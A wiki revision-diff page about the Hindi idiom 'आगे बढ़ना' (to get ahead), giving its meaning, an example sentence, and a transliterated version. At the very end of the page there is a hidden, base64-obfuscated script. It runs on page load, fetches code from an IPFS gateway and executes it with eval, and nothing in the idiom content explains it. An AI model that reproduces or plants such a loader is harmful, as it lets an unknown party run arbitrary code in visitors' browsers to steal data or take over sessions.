Difference between revisions of "आगे बढ़ना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''आगे बढ़ना''' एक प्रचलित कहावत लोकोक्ति मुहावरे|लो...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
 
'''आगे बढ़ना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
 
'''आगे बढ़ना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
  
'''अर्थ'''- अपेक्षाकृत अधिक [[सफलता का शॉर्ट-कट -आदित्य चौधरी|सफलता]] प्राप्त करना, फलत: उंत्रत समृद्ध हो जाना।
+
'''अर्थ'''- अपेक्षाकृत अधिक सफलता प्राप्त करना, फलत: उंत्रत समृद्ध हो जाना।
  
'''प्रयोग'''- जो [[देशभाषा-विज्ञान कला|देश]] हमसे पीछे स्वतंत्र हुए वे भी कई क्षेत्रों में हमसे आगे बढ़ गए है।
+
'''प्रयोग'''- जो देश हमसे पीछे स्वतंत्र हुए वे भी कई क्षेत्रों में हमसे आगे बढ़ गए है।
  
  

Revision as of 11:23, 24 October 2015

age badhana ek prachalit lokokti athava hindi muhavara hai.

arth- apekshakrit adhik saphalata prapt karana, phalat: uantrat samriddh ho jana.

prayog- jo desh hamase pichhe svatantr hue ve bhi kee kshetroan mean hamase age badh ge hai.


tika tippani aur sandarbh

sanbandhit lekh

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>